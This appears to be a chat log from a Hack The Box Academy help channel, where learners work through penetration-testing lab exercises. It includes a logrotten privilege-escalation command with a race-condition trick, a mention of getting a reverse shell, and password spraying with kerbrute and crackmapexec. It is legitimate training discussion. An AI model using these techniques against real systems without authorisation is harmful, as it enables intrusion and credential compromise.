how im going to show the errors? without proof, and its just 1 photo, of the specific problem.

if you believe there's an error post in #1234357888114364508

you can just link the page and describe the issue too

@cloud urchin got the flag for SMTP 💪 needed help from gpt to figure out how to login to the email. Thankfully it didn't steer me wrong though.

chatgpt is a powerful tool if used correctly

beat me to it 😉

Agreed. It also sends me down many rabbit holes. It's definitely a give-and-take relationship.

just need a sanity check on Advanced XSS and CSRF Exploitation - Misc CSRF Exploitation exercise. after logging in, am i supposed to be redirected to /login.php?

can you see where you're supposed to be redirected in the response?

it's supposed to be /profile.php, but i get 302 redirect to /login.php

login, server-side redirect to /admin.php -> /admin.php client-side redirect to /profile.php -> /profile.php server-side redirect to /login.php

i don't think i get that when i log in

wow...the uh... Misc section of Linux Privesc really is that simple huh... not much to it...

the exercise might be borked then

just uh

do thing

:/

that wouldn't stop completing the exercise

i just completed the exercise without issue

i never got redirected to login.php after logging in, but it doesn't matter for this anyway

Please I need a guide I'm just a beginner coming into the cyber security space with no pior tech knowledge

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Im looking for someone who has done the module web attacks specifically the advanced file disclosure, i am stuck with the the files not showing up just a blank page any assistance would be amazing

OK so it did stop me from completing it because i needed to access /profile.php to get the flag

hey guys

I need some help

i cleared my cookies and i was able to access the page

maybe i misunderstood what you were asking

How do I find the common date on which all returned events took place on Elastic Stacks? I've tried everything for this module, however I cannot seem to figure it out. https://academy.hackthebox.com/module/211/section/2276

it's all good, got the flag in the end

?? Please someone?

Damn, no-one wants to help?

no one is monitoring this chat 24/7

Okay

Sorry

I figured it out. It was quite intriguing to say the least. Had to create a bar chart with the horizontal axis being @timestamp and chaning the interval to @timestamps per day and then finding the most timestamps per day. I found it on 2023-03-05.

the question could be worded better, but it's a very simple question

you don't need to do anything involved to solve it

Hi I'm having trouble with meterpreter section of Using the Metasploit Framework module. When I try scanning with nmap within metasploit it says database not connected. I looked to see if postgresql is installed and got this:

┌─[us-academy-4]─[10.10.15.140]─[htb-ac-605555@htb-xrvkqlfhf6]─[~]
└──╼ [★]$ sudo service postgresql status
○ postgresql.service - PostgreSQL RDBMS
     Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; preset: >
     Active: inactive (dead)```
Should I just use regular Nmap? What do you propose? How should I move forward?

Sorry, I was going on a limb because I was trying to figure it out, so I typed it really fast. I actually copy and pasted the question from the actual module.

And you have to create a bar chart to solve it

you don't have to create anything to solve it

Well I had to find the date :/

the date is very easy to find, you just have to understand what the question is asking

i'd show you, but HTB thinks i'm a bot right now so i can't actually look at the question

Oh

@quasi wave Did you start POSTGRE?

I did it didn't work

┌─[us-academy-4]─[10.10.15.140]─[htb-ac-605555@htb-xrvkqlfhf6]─[~]
└──╼ [★]$ sudo service start postgresql
start: unrecognized service

Try systemctl

ok

$ sudo systemctl start postgresql

And then after

it worked thanks

$ sudo systemctl enable postgresql

ok great will do that too

And then check the status!

ya its active

I did thanks

Okay good!

No problem.

it still says database not connected

Hm

hold on let me try doing it within metasploit console

Do you have pgAdmin4?

Do

sudo -i -u postgres

And then psql

Then /conninfo

ok

And then do /l

ok

After you do the sudo command, type psql in your console to get the sql terminal

Security Monitoring & SIEM Fundamentals - SIEM Visualization Example 4: Users Added or Removed From a Local Group (Within a Specific Timeframe)

Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format: 20XX-0X-0X

this question is deceptively easy, you just have to read it carefully. i've bolded the keyword that you need to note. the notes i have on this question are just one sentence and a screenshot

I did

I'm in sql terminal

@dim wolf thanks

/conninfo

I did that too

What comes up?

nothing comes up and after /l nothing comes up either

Weird

kind of weird tbh ya maybe should just use nmap?

for first part and see if I run into issues

Yeah

ok I'm logged into meterpreter so I got by just fine so far

I completed the section on my own otherwise and got all the flags

super sweet how well this is going

Okay that’s good

!!!!

I think the remaining 4 sections of this module are just notetaking sections and text content and then I get to move onto password attacks

which will be great

anyway I think this section went by quickly like in one or two weeks

which is fabulous

I'm certainly getting better at working through the HTB Academy material

Thats great!

How long does this typically take ? logrotten

||./logrotten -p ./payload /home/htb-student/backups/access.log Waiting for rotating /home/htb-student/backups/access.log...||

it's like instant

it seems I needed to simulate a log write with ||echo test >> /home/htb-student/backups/access.log;./logrotten -p ./payload /home/htb-student/backups/access.log||, otherwise it was not working, I guess that's where the race condition aspect comes from, but the module does a very poor job at explaining how this exploit works....

its a very finnicky exploit and you have to be fast

yeah for some reason I could not get it to set the SUID bit, only getting a reverse shell and setting the SUID quickly from there

,

E

you should delete the pic

i believe it's because the cred dump includes the ntlm hash of the different identities allowed by the delegation

Hello guys am just starting with my academy lessons I need help with this question. Which shell is specified for the htb-student user?

sorry what? is that in a module or something?

please help me on last 2 Q. : Password Attacks | Pass the Ticket (PtT) from Linux
I'm in "root@linux01:/#" but still getting failed

https://academy.hackthebox.com/module/80/section/837

I have no idea about What is one prominent issue with passwords? in this module.
Can someone please help me?

hi all, apparently I'm stuck a first Skills Assessment first question DACL ATTACKS I: "What's the username of the account that Carlos can perform a targeted Kerberoasting attack against?"

I used sharphound to collect data and ingest into Bloodhound, set carlos as "owned" a then used "List all kerberoastable accounts".

Actually I got 3 users, and I am able to get hashes for all of them, but none is the correct answer. Any suggestion? thank you!

it's easier for you to help people if you have the module name and section name along with what you have tried and your current understanding

as for your question, see: https://man7.org/linux/man-pages/man5/passwd.5.html

Hello ??

I have a question regarding oscp

The price for 3 months access is 1649$ does that mean I should do the exam right after the end of my course access? Or I can do it later on?

read and follow #welcome to ask in a more appropriate channel

Any idea why tihs isnt runnning? I think the command is correct should be running...

The module name is Linux fundamentals

You can DM me

Worked wit crackmap hydra deosnt run ...

Acadamy - module - web Fuzzing - Virtual Host and Subdomain Fuzzing - Question - Using GoBuster against the target system to fuzz for vhosts using the common.txt wordlist, which vhost starts with the prefix "web-"? Respond with the full vhost, eg web-123.inlanefreight.htb - The command to run is - gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/SecLists/Discovery/Web-Content/common.txt --append-domain - But there is no VHOST starting with "-web" ?? any other method to find it ? or is my command wrong ? Plz help

Why are you using port 81?

https://academy.hackthebox.com/module/113/section/2139 Module Attacking Thick Client Applications
I don't understand, everything goes wrong for me already in the first stage.

No, I am using the IP:Port of the machine... It's just the default command given in the module... Sorry I didn't change it

Anyone knw what header on title page say when opening aquatonr html page ?

Did you enter the IP and domain in the hosts file?

open a page and have a look 😉

@acoustic owl Hi can you help plz

What exactly is the problem? You started a program and it terminated after the work was done. This is completely normal behavior

In this step, I don't have a .exe file created.

Hi, i am currently working on the Attacking AD module section Password spraying from linux

I am workin on the end of section question "Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer. "

I enumerated users using an anonymous ldap bind. Filtered list of found users for those beghinning with s. Then used crackmapexec to attempt to login with Welcome1 as a password for the saved user list. I used the UserPrincipalName as a pose to the SAMAccountname as the username

You have to go through the module step by step. If you miss a small detail, it will not work.
Restart the Machine and try again

Thus far haven't been able to locate the user which has Welcome1 password

I feel like the user enumeration should be fine as it's via an ldap anon bind on the DC itself so i should have "all" the users to try

perhaps sam account name and local login to the DC

any hints welcome

i'd use kerbrute rather than cme/nxe for password spraying

have anyone installed bloodhound in pwnbox before sucessfully?
did you used the one given or installed via pipx install bloodhound
or pipx install bloodhound.py ?

ok i can try with kerbrute, but in this case i don't expect the results to be different.... however for reasons of stealth kerbrute is prob. a better option right?

Then one more question. When I run ProcMon64 to RestartOracle-Service, but I don't see for some reason and even through the search ctrl + f

goddamit

i got a hit with kerbrute

i don't fully understand why

i believe it's faster since it uses Kerberos to authenticate rather than authenticating to SMB and having to query the DC

yes faster for sure

but i don't understand why i got kerbrute report success and crackmapexec not report hit

So it is already on the machine

could be a number of reasons

hmmm

Again, do exactly what it says step by step
If it says to download it, then download it

maybe with crackmapexec i am trying to login to smb

you could be doing local auth instead of kerberos auth

not really sure

i'm using smb to login.... not using local-auth

in password attacks password mutation do you realy have to wait for this long? (21h)?

It wasn't told to add the IP to hosts file... But still did with the domain "inlanefreight.htb".... Didn't work

Interesting

using samaccountname with crackmapexec and smb protocol works

using kerbrute UserPrincipalname works

htb is not an authorized top level domain. Therefore, the root servers cannot resolve this top level domain. For this reason, you must always resolve such a domain locally

just grab it from source

git clone https://github.com/dirkjanm/BloodHound.py
cd BloodHound.py
pipx install .

Ok will remember this... What domain shall I add for this module ?

Cause I tried the inlanefreight.htb... didn't work ?

This domain was mentioned in the examples

For which domain are you looking for a vHost?
You can only enter the domain, not the port in the hosts file.
10.10.10.10 example.com

Ohh... Didn't know that, will try it again after some time

Thanks

https://www.cloudflare.com/learning/dns/what-is-dns/

Hi all, I have a question regarding the “Get started” module, “public exploit” section.
The exercise says “Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file.”
How could I know there is indeed a txt file with that specific name at that address? Would that be by using gobuster explained in a previous section?

what's the first thing one usually do when they get an IP address?

At my knowledge level? ping, nmap and maybe browse to the IP address

So don't you know what's on the webpage of that Ip adress when you browse it?

You can use searchsploit to find vulnerabilities.

Yes, I could find the "wp_simple_backup_file_read" vulnerability and use it. My question is rather how would I know the target filepath "/flag.txt" if Academy had not provided it in the first place? I guess there should be a way to enumarate subdomains or files? (hence my guess of gobuster)

That filepath is the path where you want your outputs to be.

Isn't it the target? had to change it for the /flag.txt in order to complete the exercise

Did it work?

About filepath. I'm not sure. But I'd assume these are configuration we are setting for exploit. One of those is where you want your outputs to be created. But then again, that shouldn't be specificied as required could it be the directory at target's end? In home, probably.

What was the content of flag.txt? Probably not a password.

Yes, it was a string of characters to validate the exercise. It was indeed the directory at target's end. Thanks for your help 🙂

Conclusively. I'm not sure the directory was at target's end.

But it sure worked when i assumed so.

You may research more about it. You're welcome.

I have been stuck on the same section, I ran the nmap scan and it returns me two different nginx web servers running on the host. How did you find out the WordPress service?

by browsing to the host IP with Firefox, the service is written on the main page

God 🤦‍♂️ I have been running nmap scans and finding everything instead of just accessing the host.

thanks man!

I think I can figure out the rest

I understand, I started HtB by only using the terminal to enumerate. But the Web Request module got me used to browse randomly just in case

I will add this step to my "first things first" list xD

Hello everyone,i just want to ask a questio.There is any news about any module that will focus on Cloud PenTesting?or something similar?or will be any module,in the future?thanks

hello can i share the documentaion i made about the attacking enterprise module on linked in or is it against some rule

You certainly should not share writeups about enterprise content.

Hello, i have just finished my degree in computer science. I have picked cyber security as a field to get my master's degree at. My intention was to get into ethical hacking but i have found myself defending instead of attacking '-'. Could you guys recommend me a road map to get started in White hat hacking? Thank you all in advance and my apologies for my English '-'

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

🙂